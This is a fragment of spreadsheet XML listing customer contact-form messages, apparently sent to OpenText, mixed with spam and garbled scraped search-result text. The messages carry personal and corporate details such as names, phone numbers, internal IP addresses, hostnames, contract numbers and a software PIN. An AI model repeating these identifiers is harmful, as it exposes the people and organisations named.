 &lt;u&gt;CATInteractive Syock Chart  Caterpillar Inc. Stock  Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; PDFMAINTENANCEMECHANICTRAINING -Catrepillar Your browser indicates if you've visite this link MaintenanceMechanicTraining DUTY B: Lube Systems Skill Development Giude 3 B-01: Troubleshoot Trabon Skijll Objective Given a Trabon lkube system not operating to ...   More results.&lt;br&gt;  _x000D_
excessive urination in cats diabetes _x000D_
 _x000D_
 &lt;h4&gt;HowtoRemoveTicksfromFurry Pets: 12 Steps (with Pictures) Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;h3&gt;BegnalCatsFor Sale  Chattanooga, TN #122899  Petzlover Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
  [URL=http://happy-tails-cat-rescue.cf/the-best-cat-toy-ever/]The best cat toy ever[/URL] [URL=http://happy-tails-cat-rescue.cf/cat-scratch-pictures/]Cat scratch pictures[/URL]  _x000D_
 lasermousecattoy eBay Your browser indicates if you've visited this link Find great deals on eBay for lasermousecattoyand lasercattoy . Shop with confidence.   More results.&lt;br&gt; Cat Behavior after Spaying -  Your browser indicates if you've visited this link Afterspaying, cat behavior will generally remain the same. Your cat might act differently for a few days while recoverign from the operation, but her personality ...   More results.&lt;br&gt;  _x000D_
stoo cat from chewing on cords _x000D_
 _x000D_
NoNatzPetBugSpray , 2 Oz   Your broqser indicates if you've visited this link 2 OzNoNatz BugSpray . Works Best On All Gnat Varjeties. Works On Mosquitoes, All Fly Varie</t>
  </si>
  <si>
    <t>I would like to look at pricing for starting an account</t>
  </si>
  <si>
    <t>Is ApplicationExtender Oracle 12c certified?</t>
  </si>
  <si>
    <t>We are using the vignette 7.4 version .we have some vulnerability  meltdown and spectre.Do these affect this product .If so what is the solution ?.Do you have any patches for this?</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to take this opportunity to wish you a Happy, Healthy and Prosperous new year. It is incumbent on us all to make 2018 the best we can make it. _x000D_
_x000D_
We are pleased to announce that registration for attendees and exhibitors is well ahead of all previous years for the 34th International Symposium on Child Abuse, scheduled for March 19-22, 2018 in Huntsville, AL at the Von Braun Center.  This means a better opportunity for exhibitors and advertisers to get their products and/or services in front of what promises to be a record attendance. _x000D_
_x000D_
At this moment, over 80% of our exhibit space is already filled. If you are debating about whether or not you should exhibit and/or advertise at the 34th International Symposium on Child Abuse, we suggest you visit our Exhibiting and Advertising Guide to see what past exhibitors and advertisers have said.  In addition to the demographics of our attendees, the guide illustrates what they buy, where they are from, their intention to return, and the acceptance and utilization of the Symposium Conference app designed to benefit the attendees, exhibitors, and advertisers. _x000D_
_x000D_
To secure your exhibit space, register today_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working with a client running v13.8 of Exceed on Demand and I was trying to find the latest release available. </t>
  </si>
  <si>
    <t>We are unable to identify which email address the reset password function is connected to. Please let us know which email address the password reset is going to for the BB474A user ID.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm a managed services provider.  One of my clients is looking for a desktop fax solution and I'd like to discuss the various products you offer so as to ensure we suggest the correct one.  Can you please contact me to discuss this opportunity?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Looking at the potential migration of existing Enterprise Fax Server to OpenText Cloud Fax</t>
  </si>
  <si>
    <t>Interested in addons that can enhance MS SharePoint functionality, especially collaboration, archiving and governance. If someone from our company already looking into it, please provide me with their contact information. Thanks</t>
  </si>
  <si>
    <t>Looking for a demo of functionality of Faxing as a Service.  Currently using Rightfax for faxes as Canadian Blood Services.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring Dental Professionals Email database? Or possibly interested in updating your current client list?_x000D_
_x000D_
Our list includes:_x000D_
_x000D_
•	Dental Clinics list _x000D_
•	Dental Labs list_x000D_
•	Dental Pharmacies list_x000D_
•	Doctors of Dental Surgery _x000D_
•	Endodontists list _x000D_
•	Oral Surgeons list_x000D_
•	Dental Surgeons list_x000D_
•	Orthodontists list_x000D_
•	Periodontists list_x000D_
•	Prosthodontists list _x000D_
•	Oral and Maxillofacial Surgeons list _x000D_
•	Pediatric Dentists list _x000D_
•	Dental Hygienists list _x000D_
•	Dental Assistants list _x000D_
•	Oral Radiologists list_x000D_
•	Implantologists list_x000D_
•	Oral Pathologists list etc_x000D_
	_x000D_
Our database includes verified email address along with multi channel marketing details like NPI Number, company name, company website, contact name, contact title, address, phone, fax, SIC Code, employee size, revenue size, industry descriptions etc_x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, I would be very grateful if you could provide their details or forward this email to him/her, thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards,_x000D_
Amber Perrett_x000D_
www.krystalcommunication.com_x000D_
</t>
  </si>
  <si>
    <t>I would like to get education pricing on OpenText HostExplorer. I would be looking at between 5 to 10 licenses, depending on price. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cole Allen</t>
  </si>
  <si>
    <t>We are required by Kohl's to set up a digital catalog and Open Text was listed as an approved vendor. I am also interested in many of your other enterprise products.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Last year we exchange couple of emails about Media Asset Management. I need to figure out and many servers (Virtual/Physical) I need to order from SSC in order to implement DAM. SSC need to see specs requirement from the vendor._x000D_
_x000D_
DAM will be in our Phase 3 of the GCDOCS implementation. We are getting close to deploy GCDOCS 16.2.2  to our users across the country. Besides GCDOCS we will eventually look at:_x000D_
_x000D_
-Collaboration GC EPMO Solution_x000D_
-Scanning GC EPMO solution_x000D_
-Utilization &amp; Performance Reporting_x000D_
-Bulk permissions Update_x000D_
-Mobility_x000D_
-Disposition Process_x000D_
-Advanced reporting &amp; content Analysis_x000D_
_x000D_
Even if the implementation of DAM is not for tomorrow we want to engage to request with SSC to order the proper equipment. Can you guys help me figure out what we will need for the Digital Asset Management. How many server with specs_x000D_
</t>
  </si>
  <si>
    <t>Requesting support on an error that's continually being generated on one of our RightFax servers._x000D_
This error is generated on an ongoing basis, sometimes running for days, with an occasional warning in between the errors._x000D_
The error 3314 displays the following: FRF: Abandoning attempts to route to path "\\NETB-PFSX-FILE1\F2O_DE_x000D_
I have ping the resource and it's available on the network._x000D_
Here's the XML view of error:_x000D_
- &lt;Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"&gt;_x000D_
- &lt;System&gt;_x000D_
  &lt;Provider Name="RightFax WorkServer1 Module" /&gt; _x000D_
  &lt;EventID Qualifiers="0"&gt;3314&lt;/EventID&gt; _x000D_
  &lt;Level&gt;2&lt;/Level&gt; _x000D_
  &lt;Task&gt;0&lt;/Task&gt; _x000D_
  &lt;Keywords&gt;0x80000000000000&lt;/Keywords&gt; _x000D_
  &lt;TimeCreated SystemTime="2018-01-08T10:45:04.000000000Z" /&gt; _x000D_
  &lt;EventRecordID&gt;99323&lt;/EventRecordID&gt; _x000D_
  &lt;Channel&gt;RightFax&lt;/Channel&gt; _x000D_
  &lt;Computer&gt;netb-papp-rfx02.am.corp.amgen.com&lt;/Computer&gt; _x000D_
  &lt;Security /&gt; _x000D_
  &lt;/System&gt;_x000D_
- &lt;EventData&gt;_x000D_
  &lt;Data&gt;FRF:Abandoning attempts to route to path '\\NETB-PFSX-FILE1\F2O_DE'&lt;/Data&gt; _x000D_
  &lt;Data&gt;[PID:2BB0,TID:1B3C]&lt;/Data&gt; _x000D_
  &lt;/EventData&gt;_x000D_
  &lt;/Event&gt;_x000D_
_x000D_
Any suggestions that you have for resolving this will be appreciated._x000D_
_x000D_
Thank you,_x000D_
Jim Reeves</t>
  </si>
  <si>
    <t>Payment for invoice was return to us as "not deliverable as addressed; unable to forward"._x000D_
The address used was PO Box 64371 Pittsburgh PA 15264-0371_x000D_
Could you please send correct mailing address please?_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted more information about opentext and its ability to fax, more importantly the capabilities it has in terms of integrating it into an existing application. please contact me between 2:00 pm - 4:00 pm eastern time. </t>
  </si>
  <si>
    <t>Hi,_x000D_
Is there a possibility to configure the XConfig Manager in a way that the session will be on monitors 2 and 3. I have a laptop what has 2 monitors connected to it. The laptop screen is screen 1 and the monitors are the extension of the desktop._x000D_
_x000D_
There is a section called "Screen" and under it there is Use Monitor(s): but when I put 2,3 there, it will show the session on all monitors, using 2-3 or 2 3 or 2;3 will just create the session on the third monitor. I am using Version 13.8.9.994 of the software.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a re seller of all ApplicationXtender products as well as Teleform and Liquid Office. I have an OpenText connect account but can no longer access the support site. I would like to have access for support of these products. </t>
  </si>
  <si>
    <t>I have tried multiple times to reset my password. It will not take a new password when I got a link to reset it.</t>
  </si>
  <si>
    <t>I need some advice on which opentext tool will be best suitable for our purpose. We are looking for a tool which only supports X11 and no other functionality. Looking for a contact person to schedule a call with our NMS team.</t>
  </si>
  <si>
    <t>How can I get a demo session/ trial version for Open Text Solution for OCR in partnership with SAP?</t>
  </si>
  <si>
    <t>Need license file for upgrade to 10.6</t>
  </si>
  <si>
    <t>Trying to log in. Received the account creation message. Confirmed details from the email OpenText sent. Tried to log in and it failed. Can you help?_x000D_
_x000D_
Thanks,_x000D_
Daryl MacKay</t>
  </si>
  <si>
    <t>Dear Sirs, _x000D_
We research the market of providers of solutions for electronic document management. One of the criteria for us is the opportunity to work with the document management system of many independent legal entities. If your solution meets these criteria, please send more information about the possibilities.Thanks in advance, Vladimir.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I like to install trial version of EMC Document Sciences XTEST tool to compare 2 different PDF files, can you please share the link to install the trial version so that we can evaluate if the tool can satisfy the below conditions:_x000D_
1.	Identify the two pages at different positions in the documents and compare_x000D_
2.	Comparison needs to happen on all aspects - content, font, position, images etc_x000D_
3.	Any additional pages in each of the document needs to be highlighted_x000D_
4.	Possibility of batch run and reporting_x000D_
We work on an insurance domain and our requirement is to compare 2 different pdfs with a specific requirements._x000D_
Best Regards,_x000D_
Somanna</t>
  </si>
  <si>
    <t>BI Query._x000D_
We wish to purchase one licence.  Can you supply this software?</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to my support portal so I can get ANX out here to do some installs that we need. Have contact multiple times via email, each time my tickets have been closed within 1-2 hours. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext _x000D_
We have a project going on to migrate an old Opentext environement to latest version (see on below) with heterogeneous migration ._x000D_
We would like a commercial assistance about  licensing check_x000D_
Could someone contact me_x000D_
Scope_x000D_
Upgrade Opentext Archive Server to 10.1 to 16.2_x000D_
Update VIM (Vendor Invoice Management) 5.2 SP2  to 7.5 (SAP )_x000D_
Update Opentext Invoice Capture Center 5.2 to 16.3 ( @ scanning side)_x000D_
•	Hostname : leacs.pa.agn_x000D_
•	IP : 139.53.213.156_x000D_
</t>
  </si>
  <si>
    <t>I was wondering if there are any training classes for TeamSite and/or MediaBin for administrators being offered. Virtual would be best.  Thanks</t>
  </si>
  <si>
    <t>Invoice 9000308319_x000D_
_x000D_
Hello_x000D_
_x000D_
We urgently need the key for 2018! Since the 1st of January we can not work anymore!_x000D_
_x000D_
Thank you very much._x000D_
_x000D_
_x000D_
With kind regards</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Greetings Exhibitors,_x000D_
This is Michael V. Tran, and I handle the majority of business-to business accounts and oversee the hotel inventory list during various corporate events within the United States. From my understanding, you are attending SAPPHIRE Now ASUG Annual Conference 2018 specifically located at the Orange County Convention Center from June 4-7, 2018. _x000D_
Events Plus has negotiated corporate travel discounts and secured a limited number of hotel rooms through various suppliers on your behalf to make your trip to Orlando, FL affordable &amp; convenient._x000D_
Please keep in mind that these rooms are on a first-come, first-serve basis and will sell out quickly due to a high volume of current requests with attendees, speakers, and exhibitors. _x000D_
_x000D_
SpringHill Suites Orlando Convention Center_x000D_
8840 Universal Boulevard  Orlando  Florida  32819  USA _x000D_
Our Rate: 139/Night (Promo Ends on January 22, 2018)_x000D_
After Promo Rate: 179/Night _x000D_
•	3 Star Hotel_x000D_
•	0.6 Miles from Convention Center_x000D_
•	Studio Suite with Kitchenette_x000D_
•	Complimentary shuttle services_x000D_
•	Complimentary breakfast buffet_x000D_
•	Complimentary internet_x000D_
•	Complimentary parking_x000D_
•	Fitness center_x000D_
•	Business center_x000D_
•	Outdoor pool_x000D_
_x000D_
Crowne Plaza Orlando - Universal Blvd_x000D_
7800 Universal Blvd, Orlando, FL 32819_x000D_
Our Rate: 119/Night (Promo Ends on January 19, 2018)_x000D_
After Promo Rate: 159/Night _x000D_
•	4 Star Hotel_x000D_
•	1.5 Miles from Convention Center_x000D_
•	Complimentary shuttle services_x000D_
•	Complimentary internet_x000D_
•	Fitness center_x000D_
•	Business center_x000D_
•	Outdoor pool_x000D_
•	Restaurant_x000D_
•	Tiki bar_x000D_
_x000D_
Residence Inn by Marriott Orlando Convention Center_x000D_
8800 Universal Blvd, Orlando, FL 32819_x000D_
Our Rate: 149/Night (Promo Ends on January 22, 2018)_x000D_
After Promo Rate: 189/Night _x000D_
•	3.5 Star Hotel_x000D_
•	0.6 Miles from Convention Center_x000D_
•	Studio Suite with Kitchenette_x000D_
•	Complimentary shuttle services_x000D_
•	Complimentary breakfast buffet_x000D_
•	Complimentary internet_x000D_
•	Complimentary parking_x000D_
•	Fitness center_x000D_
•	Business center_x000D_
•	Outdoor pool_x000D_
_x000D_
For</t>
  </si>
  <si>
    <t>Temos o E-docs instalado em nosso ambiente, o produto está sem manutenção, gostaríamos do apoio de voces para realizarmos as devidas atualizações e suporte.</t>
  </si>
  <si>
    <t>We are looking for Open Text Brava Image only module. The requirement is for 3 numbers of Network license. Can we have a quote for the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Internal:_x000D_
links in _x000D_
https://www.opentext.de/was-wir-tun/produkte/opentext-produktangebotskatalog/produkte-mit-neuer-markenbezeichnung/captaris-heisst-jetzt-opentext_x000D_
_x000D_
do not work._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi We are looking for an alternative in-house FoIP solution_x000D_
_x000D_
Currently we have a 12-channel FoIP using t.38 protocol. no fax board at all_x000D_
_x000D_
Do let us know what is the estimated cost to set up a similar solution._x000D_
Faxes routes to the internal SMTP gateway as well.._x000D_
_x000D_
Thanks._x000D_
Jansen </t>
  </si>
  <si>
    <t>Want to demo your HIE platform</t>
  </si>
  <si>
    <t xml:space="preserve">Maths problems </t>
  </si>
  <si>
    <t>Need guidance on upgrading OpenText Archive from version 10.1.1 to 10.5</t>
  </si>
  <si>
    <t>cancel services. Made several attempts _x000D_
fax2mail 6313434811</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know Account manager name and contact detail for our company._x000D_
_x000D_
We are supposed to upgrade our Documentum system to current version and I am in search of any service provide who have contract with you._x000D_
_x000D_
Please provide the detail of any service provider company. Who will help in this issue._x000D_
</t>
  </si>
  <si>
    <t>Recently United Commercial Bank Limited has received a "Partner Master Agreement" between "Open Text" and "Intellicon Systems" signed by Jennifer Kerr dated 3rd January 2018. Please authenticate this at the earliest.</t>
  </si>
  <si>
    <t>Recently United Commercial Bank Limited has received a "Partner Master Agreement" between "Open Text" and "Intellicon Systems" signed by Jennifer Kerr dated 3rd January 2018. Please validate this at the earliest.</t>
  </si>
  <si>
    <t>Всем привет! интересный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] Лучшие мультфильмы 2017 список [/b] [url=http://kinobunker.net/]http://kinobunker.net/[/url] _x000D_
Тут: http://kinobunker.net/main/10804-kris-evans-vedet-peregovory-o-glavnoy-roli-v-filme-dzhekill.html Крис Эванс ведет переговоры о главной роли в фильме "Джекилл" _x000D_
Тут: http://kinobunker.net/detektiv/7573-russkiy-perevod-sezon-1-2006.html _x000D_
Здесь: http://kinobunker.net/fantastika/ Лучшая фантастика 2017 бесплатно _x000D_
Здесь: [url=http://kinobunker.net/detektiv/] В хорошем качестве hd лучшие детективы [/url] _x000D_
Здесь: [url=http://kinobunker.net/semeynyy/] семейные фильмы 2016 [/url] семейные фильмы 2016</t>
  </si>
  <si>
    <t>We are requesting new licenses to support the upgrade to xpression 4.6.  We have been working with Opentext for CIM documentation, upgrade and on-site training, and we are now ready to move to production.  Roy Vieira is our OpenText PM/POC.  New Licenses should be generated for the two environments with the following IP:_x000D_
New production IP: 172.19.9.62_x000D_
New Dev IP: 172.19.108.80_x000D_
_x000D_
Please contact me or Roy for any further information - it is imperative that we get these licenses as soon as possible._x000D_
 _x000D_
Thanks and Regards,_x000D_
Gautam (Jeet) Pahuja.</t>
  </si>
  <si>
    <t>Привет всем участникам! прикольный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] лучшаЯ фантастика 2017 список [/b] [url=http://kinoklan.net/]http://kinoklan.net/[/url] _x000D_
Здесь: http://kinoklan.net/drama/3577-rover-the-rover-2014.html [b] Смотреть Ровер / The Rover (2014) онлайн бесплатно [/b] _x000D_
Тут: http://kinoklan.net/news/8941-strelba-v-tennessi-postradali-tri-zritelya-bezumnogo-maksa.html _x000D_
http://kinoklan.net/uzhasy/ [b] список 2017 лучшие ужасы [/b] _x000D_
[url=http://kinoklan.net/uzhasy/] 2017 список лучшие ужасы [/url] _x000D_
[url=http://kinoklan.net/uzhasy/] список 2017 лучшие ужасы [/url] список 2017 лучшие ужасы</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
_x000D_
My name is Christine Hallares, and I work in the Starbucks IT-Sourcing group. I am contacting you on behalf of one of our internal partner, as she is interested in learning more about OpenText’s available products and services. In anticipation of these discussions, we wish to execute our standard NDA between Starbucks and OpenText. Please note, we will only be inquiring about very base level information and ask that you limit disclosed information to that which is publicly available. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Please respond back to IT-Sourcing@starbucks.com_x000D_
</t>
  </si>
  <si>
    <t>The County of Santa Clara is interested in a Content Management platform. Please contact me for some discussion. Thank you!</t>
  </si>
  <si>
    <t>We have upgraded one of our users to DM10 to resolve an issue with DM footers, but while testing before giving her the new computer I noticed that save as for a document with a .doc extension does not automatically save to MS Word.  Leaving that blank will leave us open to launch problems if somebody types in Word rather than MS Word.</t>
  </si>
  <si>
    <t xml:space="preserve">New York Public Radio (NYPR) seeks the implementation of a company-wide Media Asset Management System. We are midsized media company (~400 employees, plus contractors). We own 6 radio stations, have a podcasting division called WNYC Studio, run a performing arts space, and have live video camera feeds for our daytime talk radio programs. We are one of the largest public media companies in the country and we are looking for a DAM to help manage our archives of video, audio, photos, and marketing materials. We are also looking for a system to help us streamline production workflows across departments. Briefly, the goals are:_x000D_
_x000D_
•	Create a comprehensive central repository for NYPR-produced assets_x000D_
•	Reuse materials for internal business purposes (production elements)_x000D_
•	Manage rights metadata and permissions of NYPR-produced assets_x000D_
•	Reuse materials for external business purposes (outside licensing requests)_x000D_
•	Share assets over the internet to business partners_x000D_
•	Standardize metadata across News, Digital Content, Video, Marketing, Broadcast, Business, IT, and Podcast production teams_x000D_
•	Make assets easier to find_x000D_
•	Manage assets in a tiered, highly configurable storage environment, with a mix of local and cloud storage solutions_x000D_
•	Standardize production, distribution, and archiving workflows across departments_x000D_
</t>
  </si>
  <si>
    <t>We used to have an network ID AM361, user name AM361A when we were working with Macy's. Do you know if that account is still active? Account was probably set up under Michelle Lauderman at Amanti Art 2814 Perry St, Madison WI 53713 or Scott Longua. _x000D_
_x000D_
Thanks, _x000D_
Michelle</t>
  </si>
  <si>
    <t>I need a quote to renew contract # 12250459 for Fax Gateway 2100 Modular Fax Gateway 1T1/E1 SIP/ T.38 - North America Edition_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Entergy has a contract #10504730 with Open Text for Crawford software and support that expires 2/7/2018. I was trying to get a quote for renewal for this contract, but we do not have any specific Open Text contact's name and information to request the quote. </t>
  </si>
  <si>
    <t>Can not find my account to login.  Need it reset</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for cloud solution for sending faxes. Please provide the quote and features of right fax solutions. </t>
  </si>
  <si>
    <t>Unable to reset my password or login with support account.</t>
  </si>
  <si>
    <t>Federal Contractor Needing quote for the following:_x000D_
001 PROCESS SUITE NAMED USER LICENSE OpenText (BRAND NAME)  _x000D_
 _x000D_
QUANTITY: 1 _x000D_
 _x000D_
SPECS:  100 Standard Named Users (Server/Cpu/Instance License Required) _x000D_
 _x000D_
002 PROCESS SUITE PROCESS PARTICIPANT USER LICENSE OpenText (BRAND NAME)  _x000D_
 _x000D_
QUANTITY: 1 _x000D_
 _x000D_
SPECS:  500 Standard Participant Users (Server/CPU/Instance License Required)   003 MAINTENANCE  _x000D_
 _x000D_
QUANTITY: 1 _x000D_
 _x000D_
SPECS:  Support Hours - Support Services need to be available during regular business hours Monday through Friday (8am to 5pm EST.).  Supported Versions- A version will be considered an instance of the current covered software, which is released by the with its own unique version number.  Support will cover each major/minor version (for example, 9.x) of the current covered software for a period of, sixty (60) months after the major/minor version release is made available to users (Current Maintenance).  Technical Support Request Response Times –  o For an SR Classified as critical - 1 hour o For an SR Classified as serious - 5 hours o For an SR Classified as normal - 24 hours  Technical Support Request Clarification-   o (a) Critical - A technical support request will be classified as critical if the performance issue reported causes the software to be functionally inoperable and prevents the software from being used in production mode and/or creates a work stoppage for users. _x000D_
Procurement Sensitive: Unauthorized disclosure of this information violates the Procurement Integrity Act. See FAR 3.104 - 53 - _x000D_
o (b) Serious - A technical support request will be classified as serious if the performance issue reported significantly degrades the performance of the software or materially restricts your use of the software in production. o (c) Normal - A technical support request will be classified as normal if the performance issue reported is a question regarding end use, configuration of the software or a minor defect in the software which does no</t>
  </si>
  <si>
    <t>Software Purchase Quote_x000D_
Currently we have Brava! Desktop SX with  BravaDesktop_16.0.2.7_Hotfix_062516.Later we puchased Brava! Doc Merge.  The software is used for converting CadKey files to PDF._x000D_
Software PIN: IGC407453_x000D_
Software ID: a036000000gM47CAAS_x000D_
_x000D_
We would like a quote for a second seat. Thanks for all your help._x000D_
_x000D_
Regards,_x000D_
_x000D_
Eric Valdivia, PE</t>
  </si>
  <si>
    <t>REMOVE our number from your call list.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
We received an urgent request to price out and compile information regarding IP Docketing/Management software options. I have been pursing your website for the information I’m seeking but cannot seem to find exactly what I’m looking for. I’m hoping you can  let me know if your software meets the specifications we require as follows:_x000D_
_x000D_
•	Consolidates workflow into one system of records (e.g., AVIS – Brevet)_x000D_
•	Update, assign, and reassign requests received from the AR Network_x000D_
•	Manage patent annuities, trademark renewals, and foreign filing extensions _x000D_
•	Efficiently manage internal documents, deadlines, and alerts_x000D_
•	Simple interface for capturing invention disclosures from AR Network_x000D_
•	Provide dashboard and reports related to the IP portfolio (KPIs)_x000D_
•	Module for management of contractual agreements_x000D_
•	Ability to manage global litigation, opposition, counterfeit activities_x000D_
•	Easily archives internal and external correspondences via MS Outlook_x000D_
•	Consistent and reliable performance (speed &amp; accessibility)_x000D_
•	Interface with Orbit_x000D_
•	Pricing and specific programs/software required._x000D_
_x000D_
Thank you in advance for your time; I look forward to hearing from you!_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm looking for a bulk redaction solution to integrate with our iManage Document Management System to redact PII information from Acrobat PDF 1.6 and Microsoft Word 97-2016 files. Ideally we would like to redact old files first and then setup a schedule to redact future documents as they come into the system.  The Main road block is with  how the documents are stored. They are in a shared folder in the iManage server, use iManage proprietary document numbering system and are also encrypted._x000D_
_x000D_
Let me know if this is something you can help me solve._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jerry</t>
  </si>
  <si>
    <t xml:space="preserve">I need to find out more about current efax offerings for our SMB clients.  We have a couple that use RightFax and old Captaras products and we have clients that need to move to efax, so your guys name came up.  </t>
  </si>
  <si>
    <t>I am interested in buying two licenses for the "OpenText Gupta Report Builder".</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to have a brief conversation with a company representative to discuss customer communication management </t>
  </si>
  <si>
    <t>I am interested in InfoArchive. I would like to speak with a rep.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
I can not validate the creation of my partner account._x000D_
_x000D_
Thank you in advance for your reply,_x000D_
</t>
  </si>
  <si>
    <t>I have an older version of Brava!Desktop (Brava!Desktop SXL build 7.1.0.12). Is this upgradable, or do I have to buy a new version?</t>
  </si>
  <si>
    <t>I would like to know the end of support for HPExstreme 3.3.1 &amp;  HPExstreme command center 3.0.2.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
We request you to please help us with a quote for "Maintenance - Open Text". The details of the opportunity are available at https://www.fbo.gov/?s=opportunity&amp;mode=form&amp;id=ff16dc6a40cf97777ae42e8208b4f3a8&amp;tab=core&amp;_cview=1 _x000D_
_x000D_
This Federal Reserve issued acquisition is set-aside for Total Small Business, and 4WardTech is a certified SDVOSB firm. The 4WardTech SDVOSB information is available on the U.S. Department of Veterans Affairs link - https://www.vip.vetbiz.gov/Public/Search/ViewSearchResults.aspx?SCID=4503428_x000D_
_x000D_
Thank you in advance for your help._x000D_
_x000D_
Regards,_x000D_
Vin - 6196090333</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous sommes un cabinet conseil et l'un de nos clients est à la recherche d'une solution fax to mail pour son groupe._x000D_
Cela représente environ 1000 collaborateurs répartis sur 42 agences en France uniquement. Potentiellement des logiciels métiers à interconnecter avec la solution fax._x000D_
Dernier point : Les numéros de fax sont existants et à conserver._x000D_
Pourriez-vous me contacter afin de voir les solutions que vous proposez et leur fonctionnement._x000D_
Je vous en remercie d'avance et je vous souhaite une bonne journée,_x000D_
_x000D_
Bien cordialement, _x000D_
Jan-Eric MAASCH</t>
  </si>
  <si>
    <t xml:space="preserve">0420_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have received a mail with confirmation account created but I do not have access to support._x000D_
Regards </t>
  </si>
  <si>
    <t>Hello, please give me a call back at 6510 6181 to discuss my request for pricing for Open text for a scale of 1-50 users and with 4 years of subscription. _x000D_
_x000D_
_x000D_
Regards,_x000D_
Jenny</t>
  </si>
  <si>
    <t>Please tell me about obtaining Captiva Capture 7.6 activation code._x000D_
_x000D_
_x000D_
I accessed the Web page of the "Online Input Accel Server Activation" link in the Server Activation pane of Captiva Administrator for obtaining the activation code._x000D_
_x000D_
_x000D_
However, the following message is displayed on the Web page and activation request can not be made._x000D_
_x000D_
_x000D_
"_x000D_
No Access_x000D_
_x000D_
_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Almost there!_x000D_
_x000D_
_x000D_
Our records have been registered for access to my support but have not confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process_x000D_
_x000D_
_x000D_
Request Confirmation Email_x000D_
"_x000D_
_x000D_
_x000D_
I entered account information at the link destination described in the e-mail received with "Request Confirmation Email" and tried again to obtain the activation code, but the "No Access" page was displayed._x000D_
_x000D_
Is my procedure wrong?_x000D_
_x000D_
Or is there insufficient authority to acquire?_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>Request for quote: OpenText Process Suite Process and OpenText Contract Center Add-on to process Suite participant user license</t>
  </si>
  <si>
    <t>I just downloaded Brava reader and received notification that beginning in April the software will no longer be available.  We have used your software for years to measure architectural documents and I am happy to purchase a license to continue this function.  Which is the right product for us?</t>
  </si>
  <si>
    <t>Looking for drawing overlay and mark-up tool</t>
  </si>
  <si>
    <t>Toyota WA/Perron Group are looking to replace their current document management system/processes. I would like to assess the Documentum product and have an RFP that I am keen for you to complete.  Can you please call or email to discuss?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Please give me price of OpenText Brava products bellow is:_x000D_
Software Purchase incl. 1st year maintenance :_x000D_
1. OpenText Brava Enterprise All-in-One SKU: Doc/Image/CAD with redaction, All Features (per Named User), Version 7.2.  -------- Qty. 10_x000D_
2. OpenText Blazon Enterprise - Base Module incl. add-on redaction, Version 7.2.  -------- Qty. 1</t>
  </si>
  <si>
    <t>We are trying to open a ticket as we are a current user of Teamsite, I have tried a couple times to "Request Confirmation Email" but for some reason I still cannot get in.</t>
  </si>
  <si>
    <t>Issues with rightfax.  It won't allow us to log into it on our server.</t>
  </si>
  <si>
    <t>I am currently trying to gain access to "My Support". I have purchased Brava! Desktop DXP 16.3 from OpenText. Receipt No. 3533-4499-1257-1808_x000D_
_x000D_
The instructions are as follows:_x000D_
_x000D_
- Please visit: http://support.opentext.com and follow the below steps:_x000D_
- Click on Accounts on the Top Menu_x000D_
- Select Activations/Keys_x000D_
- On the Product Activation Page Search for your IGC PIN_x000D_
- Click on the Produce License Key icon_x000D_
- Enter Required information to generate Key_x000D_
- Click Submit_x000D_
- Click Download File to obtain your License File_x000D_
- Open zip file and save IGCKey.lic to a retrievable location (i.e. Desktop)._x000D_
_x000D_
When I follow these instructions, I am requested to verify my account via OpenText Connect at this link after selecting Activation/Keys https://login.opentext.com/connect/sso_controller-profile?sys_action=sso_noperms_kc_css_x000D_
_x000D_
I am also unaware of where I can find the download link and assume that access to "My Support" would enable this. Could you please provide reassurance on this for me._x000D_
_x000D_
Pat Morris, Constructors Morris Bros Ltd</t>
  </si>
  <si>
    <t>looking for demo of Opentext and evaluation of any DM products - Not sure whether documentum or opentext is best platform.</t>
  </si>
  <si>
    <t>Interested in quote to replace old RightFax system.  Faxing around 4000 documents per month on 8-port fax card.  thanks Todd</t>
  </si>
  <si>
    <t xml:space="preserve">I haven't heard back from a recent form I put in asking the following: When faxing a document in FaxPress, it does not convert to a TIF file. It stays as a PDF and cannot fax through. Please contact me as soon as possible. </t>
  </si>
  <si>
